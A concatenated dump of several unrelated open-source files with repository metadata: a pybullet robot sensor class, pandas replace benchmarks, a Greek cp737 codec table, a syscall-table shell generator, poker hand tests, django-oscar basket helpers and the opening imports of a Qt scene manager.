nrz/ylikuutio | external/bullet3/examples/pybullet/gym/pybullet_envs/minitaur/envs_v2/sensors/sensor.py | 2 | 15551 | # Lint as: python3
"""A sensor prototype class.
The concept is explained in: go/minitaur-gym-redesign-1.1
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from typing import Any, Iterable, Optional, Sequence, Text, Tuple, Union
import gin
import gym
import numpy as np
from pybullet_envs.minitaur.robots import robot_base
from pybullet_envs.minitaur.robots import time_ordered_buffer
_ARRAY = Sequence[float]
_FloatOrArray = Union[float, _ARRAY]
_DataTypeList = Iterable[Any]
# For sensor with multiput outputs, key of the main observation in output dict.
MAIN_OBS_KEY = ""
# This allows referencing np.float32 in gin config files. For example:
# lidar_sensor.LidarSensor.dtype = @np.float32
gin.external_configurable(np.float32, module="np")
gin.external_configurable(np.float64, module="np")
gin.external_configurable(np.uint8, module="np")
# Observation blenders take a pair of low/high values. The low/high is measured
# by the latency of the observation. So the low value is actually newer in time
# and high value older. The coeff [0, 1] can be thinked as the distance between
# the low and high value value, with 0 being 100% low value and 1 as 100% high
# value.
def linear_obs_blender(low_value: Any, high_value: Any, coeff: float):
"""Linear interpolation of low/high values based on coefficient value."""
return low_value * (1 - coeff) + high_value * coeff
def closest_obs_blender(low_value: Any, high_value: Any, coeff: float):
"""Choosing the high or low value based on coefficient value."""
return low_value if coeff < 0.5 else high_value
def newer_obs_blender(low_value: Any, unused_high_value: Any,
unused_coeff: float):
"""Always choosing low value, which is the newer value between low/high."""
return low_value
def older_obs_blender(unused_low_value: Any, high_value: Any,
unused_coeff: float):
"""Always choosing the high value, which is the older value between low/high."""
return high_value
@gin.configurable
class Sensor(object):
"""A prototype class of sensors."""
def __init__(
self,
name: Text,
sensor_latency: _FloatOrArray,
interpolator_fn: Any,
enable_debug_visualization: bool = False,
):
"""A basic constructor of the sensor.
We do not provide a robot instance during __init__, as robot instances may
be reloaded/recreated during the simulation.
Args:
name: the name of the sensor
sensor_latency: There are two ways to use this expected sensor latency.
For both methods, the latency should be in the same unit as the sensor
data timestamp. 1. As a single float number, the observation will be a
1D array. For real robots, this should be set to 0.0. 2. As an array of
floats, the observation will be a 2D array based on how long the history
need to be. Thus, [0.0, 0.1, 0.2] is a history length of 3. Observations
are stacked on a new axis appended after existing axes.
interpolator_fn: Function that controls how to interpolate the two values
that is returned from the time ordered buffer.
enable_debug_visualization: Whether to draw debugging visualization.
"""
self._robot = None
self._name = name
# Observation space will be implemented by derived classes.
self._observation_space = None
self._sensor_latency = sensor_latency
self._single_latency = True if isinstance(sensor_latency,
(float, int)) else False
self._enable_debug_visualization = enable_debug_visualization
if not self._is_valid_latency():
raise ValueError("sensor_latency is expected to be a non-negative number "
"or a non-empty list of non-negative numbers.")
self._interpolator_fn = interpolator_fn or newer_obs_blender
self._axis = -1
timespan = sensor_latency if self._single_latency else max(sensor_latency)
self._observation_buffer = time_ordered_buffer.TimeOrderedBuffer(
max_buffer_timespan=timespan)
def _is_valid_latency(self):
if self._single_latency:
return self._sensor_latency >= 0
if self._sensor_latency:
return all(value >= 0 for value in self._sensor_latency)
return False
def get_name(self) -> Text:
return self._name
@property
def is_single_latency(self) -> bool:
return self._single_latency
@property
def observation_space(self) -> gym.spaces.Space:
return self._observation_space
@property
def enable_debug_visualization(self):
return self._enable_debug_visualization
@enable_debug_visualization.setter
def enable_debug_visualization(self, enable):
self._enable_debug_visualization = enable
def get_observation_datatype(self):
"""Returns the data type for the numpy structured array.
It is recommended to define a list of tuples: (name, datatype, shape)
Reference: https://docs.scipy.org/doc/numpy-1.15.0/user/basics.rec.html
Ex:
return [('motor_angles', np.float64, (8, ))] # motor angle sensor
return [('IMU_x', np.float64), ('IMU_z', np.float64), ] # IMU
Will be deprecated (b/150818246) in favor of observation_space.
Returns:
datatype: a list of data types.
"""
raise NotImplementedError("Deprecated. Are you using the old robot class?")
def get_lower_bound(self):
"""Returns the lower bound of the observation.
Will be deprecated (b/150818246) in favor of observation_space.
Returns:
lower_bound: the lower bound of sensor values in np.array format
"""
raise NotImplementedError("Deprecated. Are you using the old robot class?")
def get_upper_bound(self):
"""Returns the upper bound of the observation.
Will be deprecated (b/150818246) in favor of observation_space.
Returns:
upper_bound: the upper bound of sensor values in np.array format
"""
raise NotImplementedError("Deprecated. Are you using the old robot class?")
def _get_original_observation(self) -> Tuple[float, Any]:
"""Gets the non-modified observation.
Different from the get_observation, which can pollute and sensor data with
noise and latency, this method shall return the best effort measurements of
the sensor. For simulated robots, this will return the clean data. For reals
robots, just return the measurements as is. All inherited class shall
implement this method.
Returns:
The timestamp and the original sensor measurements.
Raises:
NotImplementedError for the base class.
"""
raise NotImplementedError("Not implemented for base class." "")
def get_observation(self):
"""Returns the observation data.
Returns:
observation: the observed sensor values in np.array format
"""
obs = self._observation_buffer.get_delayed_value(self._sensor_latency)
if self._single_latency:
if isinstance(self._observation_space, gym.spaces.Dict):
return self._interpolator_fn(obs.value_0, obs.value_1, obs.coeff)
else:
return np.asarray(
self._interpolator_fn(obs.value_0, obs.value_1, obs.coeff))
else:
if isinstance(self._observation_space, gym.spaces.Dict):
# interpolate individual sub observation
interpolated = [
self._interpolator_fn(data.value_0, data.value_1, data.coeff)
for data in obs
]
stacked_per_sub_obs = {}
for k in interpolated[0]:
stacked_per_sub_obs[k] = np.stack(
np.asarray([d[k] for d in interpolated]), axis=self._axis)
return stacked_per_sub_obs
else:
obs = np.asarray([
self._interpolator_fn(data.value_0, data.value_1, data.coeff)
for data in obs
])
return np.stack(obs, axis=self._axis)
def set_robot(self, robot: robot_base.RobotBase):
"""Set a robot instance."""
self._robot = robot
def get_robot(self):
"""Returns the robot instance."""
return self._robot
def on_reset(self, env):
"""A callback function for the reset event.
Args:
env: the environment who invokes this callback function.
"""
self._env = env
self._observation_buffer.reset()
self.on_new_observation()
def on_step(self, env):
"""A callback function for the control step event.
Args:
env: the environment who invokes this callback function.
"""
pass
def visualize(self):
"""Visualizes the sensor information."""
pass
def on_new_observation(self):
"""A callback for each observation received.
To be differentiated from on_step, which will be called only once per
control step (i.e. env.step), this API will be called everytime in the
substep/action repeat loop, when new observations are expected. Each derived
sensor class should implement this API by implementing:
my_obs = call env/robot api to get the observation
self._observation_buffer.add(my_obs)
"""
timestamp, obs = self._get_original_observation()
if self._enable_debug_visualization:
self.visualize()
self._observation_buffer.add(timestamp, obs)
def on_terminate(self, env):
"""A callback function for the terminate event.
Args:
env: the environment who invokes this callback function.
"""
pass
def _stack_space(self,
space: Union[gym.spaces.Box, gym.spaces.Dict],
dtype: np.dtype = None) -> Any:
"""Returns stacked version of observation space.
This stacks a gym.spaces.Box or gym.spaces.Dict action space based on the
length of the sensor latency and the axis for stacking specified in the
sensor. A gym.spaces.Box is just stacked, but a gym.spaces.Dict is
recursively stacked, preserving its dictionary structure while stacking
any gym.spaces.Box contained within. For example, the input action space:
gym.spaces.Dict({
'space_1': gym.spaces.Box(low=0, high=10, shape=(1,)),
'space_2': gym.spaces.Dict({
'space_3': gym.spaces.Box(low=0, high=10, shape=(2,)),
}),
}))
would be converted to the following if sensor latency was [0, 1]:
gym.spaces.Dict({
'space_1': gym.spaces.Box(low=0, high=10, shape=(1, 2)),
'space_2': gym.spaces.Dict({
'space_3': gym.spaces.Box(low=0, high=10, shape=(2, 2)),
}),
}))
Args:
space: A gym.spaces.Dict or gym.spaces.Box to be stacked.
dtype: Datatype for the stacking.
Returns:
stacked_space: A stacked version of the action space.
"""
if self._single_latency:
return space
# Allow sensors such as last_action_sensor to override the dtype.
dtype = dtype or space.dtype
if isinstance(space, gym.spaces.Box):
return self._stack_space_box(space, dtype)
elif isinstance(space, gym.spaces.Dict):
return self._stack_space_dict(space, dtype)
else:
raise ValueError(f"Space {space} is an unsupported type.")
def _stack_space_box(self, space: gym.spaces.Box,
dtype: np.dtype) -> gym.spaces.Box:
"""Returns stacked version of a box observation space.
This stacks a gym.spaces.Box action space based on the length of the sensor
latency and the axis for stacking specified in the sensor.
Args:
space: A gym.spaces.Box to be stacked.
dtype: Datatype for the stacking
Returns:
stacked_space: A stacked version of the gym.spaces.Box action space.
"""
length = len(self._sensor_latency)
stacked_space = gym.spaces.Box(
low=np.repeat(
np.expand_dims(space.low, axis=self._axis), length,
axis=self._axis),
high=np.repeat(
np.expand_dims(space.high, axis=self._axis),
length,
axis=self._axis),
dtype=dtype)
return stacked_space
def _stack_space_dict(self, space: gym.spaces.Dict,
dtype: np.dtype) -> gym.spaces.Dict:
"""Returns stacked version of a dict observation space.
This stacks a gym.spaces.Dict action space based on the length of the sensor
latency and the recursive structure of the gym.spaces.Dict itself.
Args:
space: A gym.spaces.Dict to be stacked.
dtype: Datatype for the stacking.
Returns:
stacked_space: A stacked version of the dictionary action space.
"""
return gym.spaces.Dict([
(k, self._stack_space(v, dtype)) for k, v in space.spaces.items()
])
def _encode_obs_dict_keys(self, obs_dict):
"""Encodes sub obs keys of observation dict or observsation space dict."""
return {encode_sub_obs_key(self, k): v for k, v in obs_dict.items()}
class BoxSpaceSensor(Sensor):
"""A prototype class of sensors with Box shapes."""
def __init__(self,
name: Text,
shape: Tuple[int, ...],
lower_bound: _FloatOrArray = -np.pi,
upper_bound: _FloatOrArray = np.pi,
dtype=np.float64) -> None:
"""Constructs a box type sensor.
Will be deprecated (b/150818246) once we switch to gym spaces.
Args:
name: the name of the sensor
shape: the shape of the sensor values
lower_bound: the lower_bound of sensor value, in float or np.array.
upper_bound: the upper_bound of sensor value, in float or np.array.
dtype: data type of sensor value
"""
super(BoxSpaceSensor, self).__init__(
name=name, sensor_latency=0.0, interpolator_fn=newer_obs_blender)
self._shape = shape
self._dtype = dtype
if isinstance(lower_bound, float):
self._lower_bound = np.full(shape, lower_bound, dtype=dtype)
else:
self._lower_bound = np.array(lower_bound)
if isinstance(upper_bound, float):
self._upper_bound = np.full(shape, upper_bound, dtype=dtype)
else:
self._upper_bound = np.array(upper_bound)
def set_robot(self, robot):
# Since all old robot class do not inherit from RobotBase, we can enforce
# the checking here.
if isinstance(robot, robot_base.RobotBase):
raise ValueError(
"Cannot use new robot interface RobotBase with old sensor calss.")
self._robot = robot
def get_shape(self) -> Tuple[int, ...]:
return self._shape
def get_dimension(self) -> int:
return len(self._shape)
def get_dtype(self):
return self._dtype
def get_observation_datatype(self) -> _DataTypeList:
"""Returns box-shape data type."""
return [(self._name, self._dtype, self._shape)]
def get_lower_bound(self) -> _ARRAY:
"""Returns the computed lower bound."""
return self._lower_bound
def get_upper_bound(self) -> _ARRAY:
"""Returns the computed upper bound."""
return self._upper_bound
def get_observation(self) -> np.ndarray:
return np.asarray(self._get_observation(), dtype=self._dtype)
def _get_original_observation(self) -> Tuple[float, Any]:
# Maintains compatibility with the new sensor classes."""
raise NotImplementedError("Not implemented for this class.")
def on_new_observation(self):
# Maintains compatibility with the new sensor classes."""
pass
def encode_sub_obs_key(s: Sensor, sub_obs_name: Optional[Text]):
"""Returns a sub observation key for use in observation dictionary."""
if sub_obs_name == MAIN_OBS_KEY:
return s.get_name()
else:
return f"{s.get_name()}/{sub_obs_name}"
| agpl-3.0 | 3,822,107,709,921,278,000 | 33.481153 | 82 | 0.663301 | false |
winklerand/pandas | asv_bench/benchmarks/replace.py | 1 | 2171 | from .pandas_vb_common import *
class replace_fillna(object):
goal_time = 0.2
def setup(self):
self.N = 1000000
try:
self.rng = date_range('1/1/2000', periods=self.N, freq='min')
except NameError:
self.rng = DatetimeIndex('1/1/2000', periods=self.N, offset=datetools.Minute())
self.date_range = DateRange
self.ts = Series(np.random.randn(self.N), index=self.rng)
def time_replace_fillna(self):
self.ts.fillna(0.0, inplace=True)
class replace_large_dict(object):
goal_time = 0.2
def setup(self):
self.n = (10 ** 6)
self.start_value = (10 ** 5)
self.to_rep = {i: self.start_value + i for i in range(self.n)}
self.s = Series(np.random.randint(self.n, size=(10 ** 3)))
def time_replace_large_dict(self):
self.s.replace(self.to_rep, inplace=True)
class replace_convert(object):
goal_time = 0.5
def setup(self):
self.n = (10 ** 3)
self.to_ts = {i: pd.Timestamp(i) for i in range(self.n)}
self.to_td = {i: pd.Timedelta(i) for i in range(self.n)}
self.s = Series(np.random.randint(self.n, size=(10 ** 3)))
self.df = DataFrame({'A': np.random.randint(self.n, size=(10 ** 3)),
'B': np.random.randint(self.n, size=(10 ** 3))})
def time_replace_series_timestamp(self):
self.s.replace(self.to_ts)
def time_replace_series_timedelta(self):
self.s.replace(self.to_td)
def time_replace_frame_timestamp(self):
self.df.replace(self.to_ts)
def time_replace_frame_timedelta(self):
self.df.replace(self.to_td)
class replace_replacena(object):
goal_time = 0.2
def setup(self):
self.N = 1000000
try:
self.rng = date_range('1/1/2000', periods=self.N, freq='min')
except NameError:
self.rng = DatetimeIndex('1/1/2000', periods=self.N, offset=datetools.Minute())
self.date_range = DateRange
self.ts = Series(np.random.randn(self.N), index=self.rng)
def time_replace_replacena(self):
self.ts.replace(np.nan, 0.0, inplace=True)
| bsd-3-clause | 1,624,599,673,181,421,300 | 30.014286 | 91 | 0.587748 | false |
DarioGT/OMS-PluginXML | org.modelsphere.sms/lib/jython-2.2.1/Lib/encodings/cp737.py | 1 | 7357 | """ Python Character Mapping Codec generated from 'CP737.TXT' with gencodec.py.
Written by Marc-Andre Lemburg ([email protected]).
(c) Copyright CNRI, All Rights Reserved. NO WARRANTY.
(c) Copyright 2000 Guido van Rossum.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
return codecs.charmap_encode(input,errors,encoding_map)
def decode(self,input,errors='strict'):
return codecs.charmap_decode(input,errors,decoding_map)
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return (Codec().encode,Codec().decode,StreamReader,StreamWriter)
### Decoding Map
decoding_map = codecs.make_identity_dict(range(256))
decoding_map.update({
0x0080: 0x0391, # GREEK CAPITAL LETTER ALPHA
0x0081: 0x0392, # GREEK CAPITAL LETTER BETA
0x0082: 0x0393, # GREEK CAPITAL LETTER GAMMA
0x0083: 0x0394, # GREEK CAPITAL LETTER DELTA
0x0084: 0x0395, # GREEK CAPITAL LETTER EPSILON
0x0085: 0x0396, # GREEK CAPITAL LETTER ZETA
0x0086: 0x0397, # GREEK CAPITAL LETTER ETA
0x0087: 0x0398, # GREEK CAPITAL LETTER THETA
0x0088: 0x0399, # GREEK CAPITAL LETTER IOTA
0x0089: 0x039a, # GREEK CAPITAL LETTER KAPPA
0x008a: 0x039b, # GREEK CAPITAL LETTER LAMDA
0x008b: 0x039c, # GREEK CAPITAL LETTER MU
0x008c: 0x039d, # GREEK CAPITAL LETTER NU
0x008d: 0x039e, # GREEK CAPITAL LETTER XI
0x008e: 0x039f, # GREEK CAPITAL LETTER OMICRON
0x008f: 0x03a0, # GREEK CAPITAL LETTER PI
0x0090: 0x03a1, # GREEK CAPITAL LETTER RHO
0x0091: 0x03a3, # GREEK CAPITAL LETTER SIGMA
0x0092: 0x03a4, # GREEK CAPITAL LETTER TAU
0x0093: 0x03a5, # GREEK CAPITAL LETTER UPSILON
0x0094: 0x03a6, # GREEK CAPITAL LETTER PHI
0x0095: 0x03a7, # GREEK CAPITAL LETTER CHI
0x0096: 0x03a8, # GREEK CAPITAL LETTER PSI
0x0097: 0x03a9, # GREEK CAPITAL LETTER OMEGA
0x0098: 0x03b1, # GREEK SMALL LETTER ALPHA
0x0099: 0x03b2, # GREEK SMALL LETTER BETA
0x009a: 0x03b3, # GREEK SMALL LETTER GAMMA
0x009b: 0x03b4, # GREEK SMALL LETTER DELTA
0x009c: 0x03b5, # GREEK SMALL LETTER EPSILON
0x009d: 0x03b6, # GREEK SMALL LETTER ZETA
0x009e: 0x03b7, # GREEK SMALL LETTER ETA
0x009f: 0x03b8, # GREEK SMALL LETTER THETA
0x00a0: 0x03b9, # GREEK SMALL LETTER IOTA
0x00a1: 0x03ba, # GREEK SMALL LETTER KAPPA
0x00a2: 0x03bb, # GREEK SMALL LETTER LAMDA
0x00a3: 0x03bc, # GREEK SMALL LETTER MU
0x00a4: 0x03bd, # GREEK SMALL LETTER NU
0x00a5: 0x03be, # GREEK SMALL LETTER XI
0x00a6: 0x03bf, # GREEK SMALL LETTER OMICRON
0x00a7: 0x03c0, # GREEK SMALL LETTER PI
0x00a8: 0x03c1, # GREEK SMALL LETTER RHO
0x00a9: 0x03c3, # GREEK SMALL LETTER SIGMA
0x00aa: 0x03c2, # GREEK SMALL LETTER FINAL SIGMA
0x00ab: 0x03c4, # GREEK SMALL LETTER TAU
0x00ac: 0x03c5, # GREEK SMALL LETTER UPSILON
0x00ad: 0x03c6, # GREEK SMALL LETTER PHI
0x00ae: 0x03c7, # GREEK SMALL LETTER CHI
0x00af: 0x03c8, # GREEK SMALL LETTER PSI
0x00b0: 0x2591, # LIGHT SHADE
0x00b1: 0x2592, # MEDIUM SHADE
0x00b2: 0x2593, # DARK SHADE
0x00b3: 0x2502, # BOX DRAWINGS LIGHT VERTICAL
0x00b4: 0x2524, # BOX DRAWINGS LIGHT VERTICAL AND LEFT
0x00b5: 0x2561, # BOX DRAWINGS VERTICAL SINGLE AND LEFT DOUBLE
0x00b6: 0x2562, # BOX DRAWINGS VERTICAL DOUBLE AND LEFT SINGLE
0x00b7: 0x2556, # BOX DRAWINGS DOWN DOUBLE AND LEFT SINGLE
0x00b8: 0x2555, # BOX DRAWINGS DOWN SINGLE AND LEFT DOUBLE
0x00b9: 0x2563, # BOX DRAWINGS DOUBLE VERTICAL AND LEFT
0x00ba: 0x2551, # BOX DRAWINGS DOUBLE VERTICAL
0x00bb: 0x2557, # BOX DRAWINGS DOUBLE DOWN AND LEFT
0x00bc: 0x255d, # BOX DRAWINGS DOUBLE UP AND LEFT
0x00bd: 0x255c, # BOX DRAWINGS UP DOUBLE AND LEFT SINGLE
0x00be: 0x255b, # BOX DRAWINGS UP SINGLE AND LEFT DOUBLE
0x00bf: 0x2510, # BOX DRAWINGS LIGHT DOWN AND LEFT
0x00c0: 0x2514, # BOX DRAWINGS LIGHT UP AND RIGHT
0x00c1: 0x2534, # BOX DRAWINGS LIGHT UP AND HORIZONTAL
0x00c2: 0x252c, # BOX DRAWINGS LIGHT DOWN AND HORIZONTAL
0x00c3: 0x251c, # BOX DRAWINGS LIGHT VERTICAL AND RIGHT
0x00c4: 0x2500, # BOX DRAWINGS LIGHT HORIZONTAL
0x00c5: 0x253c, # BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL
0x00c6: 0x255e, # BOX DRAWINGS VERTICAL SINGLE AND RIGHT DOUBLE
0x00c7: 0x255f, # BOX DRAWINGS VERTICAL DOUBLE AND RIGHT SINGLE
0x00c8: 0x255a, # BOX DRAWINGS DOUBLE UP AND RIGHT
0x00c9: 0x2554, # BOX DRAWINGS DOUBLE DOWN AND RIGHT
0x00ca: 0x2569, # BOX DRAWINGS DOUBLE UP AND HORIZONTAL
0x00cb: 0x2566, # BOX DRAWINGS DOUBLE DOWN AND HORIZONTAL
0x00cc: 0x2560, # BOX DRAWINGS DOUBLE VERTICAL AND RIGHT
0x00cd: 0x2550, # BOX DRAWINGS DOUBLE HORIZONTAL
0x00ce: 0x256c, # BOX DRAWINGS DOUBLE VERTICAL AND HORIZONTAL
0x00cf: 0x2567, # BOX DRAWINGS UP SINGLE AND HORIZONTAL DOUBLE
0x00d0: 0x2568, # BOX DRAWINGS UP DOUBLE AND HORIZONTAL SINGLE
0x00d1: 0x2564, # BOX DRAWINGS DOWN SINGLE AND HORIZONTAL DOUBLE
0x00d2: 0x2565, # BOX DRAWINGS DOWN DOUBLE AND HORIZONTAL SINGLE
0x00d3: 0x2559, # BOX DRAWINGS UP DOUBLE AND RIGHT SINGLE
0x00d4: 0x2558, # BOX DRAWINGS UP SINGLE AND RIGHT DOUBLE
0x00d5: 0x2552, # BOX DRAWINGS DOWN SINGLE AND RIGHT DOUBLE
0x00d6: 0x2553, # BOX DRAWINGS DOWN DOUBLE AND RIGHT SINGLE
0x00d7: 0x256b, # BOX DRAWINGS VERTICAL DOUBLE AND HORIZONTAL SINGLE
0x00d8: 0x256a, # BOX DRAWINGS VERTICAL SINGLE AND HORIZONTAL DOUBLE
0x00d9: 0x2518, # BOX DRAWINGS LIGHT UP AND LEFT
0x00da: 0x250c, # BOX DRAWINGS LIGHT DOWN AND RIGHT
0x00db: 0x2588, # FULL BLOCK
0x00dc: 0x2584, # LOWER HALF BLOCK
0x00dd: 0x258c, # LEFT HALF BLOCK
0x00de: 0x2590, # RIGHT HALF BLOCK
0x00df: 0x2580, # UPPER HALF BLOCK
0x00e0: 0x03c9, # GREEK SMALL LETTER OMEGA
0x00e1: 0x03ac, # GREEK SMALL LETTER ALPHA WITH TONOS
0x00e2: 0x03ad, # GREEK SMALL LETTER EPSILON WITH TONOS
0x00e3: 0x03ae, # GREEK SMALL LETTER ETA WITH TONOS
0x00e4: 0x03ca, # GREEK SMALL LETTER IOTA WITH DIALYTIKA
0x00e5: 0x03af, # GREEK SMALL LETTER IOTA WITH TONOS
0x00e6: 0x03cc, # GREEK SMALL LETTER OMICRON WITH TONOS
0x00e7: 0x03cd, # GREEK SMALL LETTER UPSILON WITH TONOS
0x00e8: 0x03cb, # GREEK SMALL LETTER UPSILON WITH DIALYTIKA
0x00e9: 0x03ce, # GREEK SMALL LETTER OMEGA WITH TONOS
0x00ea: 0x0386, # GREEK CAPITAL LETTER ALPHA WITH TONOS
0x00eb: 0x0388, # GREEK CAPITAL LETTER EPSILON WITH TONOS
0x00ec: 0x0389, # GREEK CAPITAL LETTER ETA WITH TONOS
0x00ed: 0x038a, # GREEK CAPITAL LETTER IOTA WITH TONOS
0x00ee: 0x038c, # GREEK CAPITAL LETTER OMICRON WITH TONOS
0x00ef: 0x038e, # GREEK CAPITAL LETTER UPSILON WITH TONOS
0x00f0: 0x038f, # GREEK CAPITAL LETTER OMEGA WITH TONOS
0x00f1: 0x00b1, # PLUS-MINUS SIGN
0x00f2: 0x2265, # GREATER-THAN OR EQUAL TO
0x00f3: 0x2264, # LESS-THAN OR EQUAL TO
0x00f4: 0x03aa, # GREEK CAPITAL LETTER IOTA WITH DIALYTIKA
0x00f5: 0x03ab, # GREEK CAPITAL LETTER UPSILON WITH DIALYTIKA
0x00f6: 0x00f7, # DIVISION SIGN
0x00f7: 0x2248, # ALMOST EQUAL TO
0x00f8: 0x00b0, # DEGREE SIGN
0x00f9: 0x2219, # BULLET OPERATOR
0x00fa: 0x00b7, # MIDDLE DOT
0x00fb: 0x221a, # SQUARE ROOT
0x00fc: 0x207f, # SUPERSCRIPT LATIN SMALL LETTER N
0x00fd: 0x00b2, # SUPERSCRIPT TWO
0x00fe: 0x25a0, # BLACK SQUARE
0x00ff: 0x00a0, # NO-BREAK SPACE
})
### Encoding Map
encoding_map = codecs.make_encoding_map(decoding_map)
| gpl-3.0 | 5,513,657,414,712,581,000 | 40.773256 | 79 | 0.735626 | false |
sebastiaangroot/kmaldetect | tools/build/gen_syscall_table.py | 1 | 1860 | """
A simple python script to generate a sh table that takes the name of a syscall as input and translates it to the number corrosponding with that syscall.
This function is used in the sig_gen.sh script, used to generate an application signature for detection in kmaldetect.
Keep in mind that the '\n' characters used here will be translated to your OS's newline convention.
"""
import sys
import getopt
def gen_function(content, f):
f.write('function get_syscall_index\n')
f.write('{\n')
f.write('\tcase $1 in\n')
for line in content:
if line.startswith('#define __NR_') and line.find('stub_') == -1:
if line[9:].find('\t') != -1:
num = line[line.find('\t', line.find('__NR_')):].lstrip('\t').strip() #num = the characters after the tab / whitespace characters, after the _NR__
name = line[line.find('__NR_') + 5:].split('\t')[0] #name = the characters after the _NR__ but before the tab / whitespace characters
elif line[9:].find(' ') != -1:
num = line[line.find(' ', line.find('__NR_')):].lstrip(' ').strip()
name = line[line.find('__NR_') + 5:].split(' ')[0]
else: #There has to be a space or tab after the #define _NR__xxx. This was not the case, so call continue on the for loop
continue
f.write('\t\t\'' + name + '\')\n')
f.write('\t\t\treturn ' + num + '\n')
f.write('\t\t\t;;\n')
f.write('\tesac\n')
f.write('}\n')
infile = '' # path to the unistd_xx.h header
outfile = '' # path to the outfile, which will be filled with a .sh function for the use in sig_gen.sh
content = '' # content of infile
opts, args = getopt.getopt(sys.argv[1:], 'i:o:', ['infile=', 'outfile='])
for o, a in opts:
if o in ('--infile', '-i'):
infile = a
elif o in ('--outfile', '-o'):
outfile = a
with open(infile, 'r') as f:
content = f.readlines()
f = open(outfile, 'a')
gen_function(content, f)
f.flush()
f.close() | gpl-2.0 | 9,037,986,725,254,694,000 | 38.595745 | 152 | 0.634409 | false |
nodermann/holdem_poker_combinations | tests.py | 1 | 1924 | __author__ = 'Lucian'
from poker_combinations import get_combo_name
from sort import sort_high_to_low, sort_by_color
from const import values, colors, color_names
import time
def get_deck():
deck = []
for i, color in enumerate(colors):
for value in list(reversed(values)):
deck.append(value + color)
print color_names[i]
print " ".join(deck[i * 13:len(deck)])
return deck
def timer(f):
def tmp(*args, **kwargs):
t = time.time()
res = f(*args, **kwargs)
print "per %f" % (time.time()-t)
return res
return tmp
@timer
def test_get_combo_name():
sample_cards = ["AS QS TS JS KS", "AC JC TC QC KC", "7C 6C TC 8C 9C", "7D 4D 5D 3D 6D",
"3H 4H 5H AH 2H", "9H JD 9S 9C 9D", "9H 5S 9S 9C 9D", "9H QS QD QC 9D",
"QH 3S QD QC 3D", "JS 2S 4S KS 7S", "JC 2C QC 5C 7C", "8C 2C QC 5C 7C",
"8C 2C QC 5C 6C", "7C 6S 5D 8H 9C", "2D 4C 5S 3D 6H", "3H 4H 5D AD 2S",
"5H 4C QD QC QS", "5H TH 6D TC TS", "5H TH 4D TC TS", "5H TH 3D TC TS",
"9H KH 9D KC 2S", "4D 4H JD JH AC", "4D 4H JD JH TS", "AD 4H JD 7H AS",
"AD TH TD 7H 8S", "6D TH TD 4H 5S", "6D TH TD 4H 3S", "6D TH TD 4H 2S",
"6D AH TD 4H 2S", "8D 5H 7D JH 2S", "8D 5H 6D JH 2S", "8D 4H 6D JH 2S"]
for card_set in sample_cards:
cards = card_set.split(" ")
cards = sort_high_to_low(cards)
print str(cards) + ' ' + get_combo_name(cards)
def test_sort_by_color():
cards = "5H 4C QD QC QS".split(" ")
print sort_by_color(cards)
def test_sort_high_to_low():
cards = "8D 5H 6D JH 2S".split(" ")
print sort_high_to_low(cards)
if __name__ == "__main__":
#test_sort_by_color()
#test_sort_high_to_low()
#get_deck()
test_get_combo_name() | mit | 5,263,241,053,939,743,000 | 31.206897 | 91 | 0.515593 | false |
lijoantony/django-oscar-api | oscarapi/basket/operations.py | 1 | 3871 | "This module contains operation on baskets and lines"
from django.conf import settings
from oscar.core.loading import get_model, get_class
from oscar.core.utils import get_default_currency
from oscar.core.prices import Price
__all__ = (
'apply_offers',
'assign_basket_strategy',
'prepare_basket',
'get_basket',
'get_basket_id_from_session',
'get_anonymous_basket',
'get_user_basket',
'store_basket_in_session',
'request_contains_basket',
'flush_and_delete_basket',
'request_contains_line',
'save_line_with_default_currency',
)
Basket = get_model('basket', 'Basket')
Applicator = get_class('offer.utils', 'Applicator')
Selector = None
def apply_offers(request, basket):
"Apply offers and discounts to cart"
if not basket.is_empty:
Applicator().apply(request, basket)
def assign_basket_strategy(basket, request):
# fixes too early import of Selector
# TODO: check if this is still true, now the basket models nolonger
# require this module to be loaded.
global Selector
if hasattr(request, 'strategy'):
basket.strategy = request.strategy
else: # in management commands, the request might not be available.
if Selector is None:
Selector = get_class('partner.strategy', 'Selector')
basket.strategy = Selector().strategy(
request=request, user=request.user)
apply_offers(request, basket)
return basket
def prepare_basket(basket, request):
assign_basket_strategy(basket, request)
store_basket_in_session(basket, request.session)
return basket
def get_basket(request, prepare=True):
"Get basket from the request."
if request.user.is_authenticated():
basket = get_user_basket(request.user)
else:
basket = get_anonymous_basket(request)
if basket is None:
basket = Basket.objects.create()
basket.save()
return prepare_basket(basket, request) if prepare else basket
def get_basket_id_from_session(request):
return request.session.get(settings.OSCAR_BASKET_COOKIE_OPEN)
def editable_baskets():
return Basket.objects.filter(status__in=["Open", "Saved"])
def get_anonymous_basket(request):
"Get basket from session."
basket_id = get_basket_id_from_session(request)
try:
basket = editable_baskets().get(pk=basket_id)
except Basket.DoesNotExist:
basket = None
return basket
def get_user_basket(user):
"get basket for a user."
try:
basket, __ = editable_baskets().get_or_create(owner=user)
except Basket.MultipleObjectsReturned:
# Not sure quite how we end up here with multiple baskets.
# We merge them and create a fresh one
old_baskets = list(editable_baskets().filter(owner=user))
basket = old_baskets[0]
for other_basket in old_baskets[1:]:
basket.merge(other_basket, add_quantities=False)
return basket
def store_basket_in_session(basket, session):
session[settings.OSCAR_BASKET_COOKIE_OPEN] = basket.pk
session.save()
def request_contains_basket(request, basket):
if basket.can_be_edited:
if request.user.is_authenticated():
return request.user == basket.owner
return get_basket_id_from_session(request) == basket.pk
return False
def flush_and_delete_basket(basket, using=None):
"Delete basket and all lines"
basket.flush()
basket.delete(using)
def request_contains_line(request, line):
basket = get_basket(request, prepare=False)
if basket and basket.pk == line.basket.pk:
return request_contains_basket(request, basket)
return False
def save_line_with_default_currency(line, *args, **kwargs):
if not line.price_currency:
line.price_currency = get_default_currency()
return line.save(*args, **kwargs)
| bsd-3-clause | 7,321,325,571,453,484,000 | 27.463235 | 72 | 0.675794 | false |
mtils/ems | ems/qt/graphics/scene_manager.py | 1 | 7140 |
from ems.typehint import accepts
from ems.qt.event_hook_proxy import SignalEventHookProxy
from ems.qt import QtWidgets, QtGui, QtCore, QtPrintSupport
from ems.qt.graphics.graphics_scene import GraphicsScene, BackgroundCorrector
from ems.qt.graphics.graphics_widget import GraphicsWidget
from ems.qt.graphics.storage.interfaces import SceneStorageManager
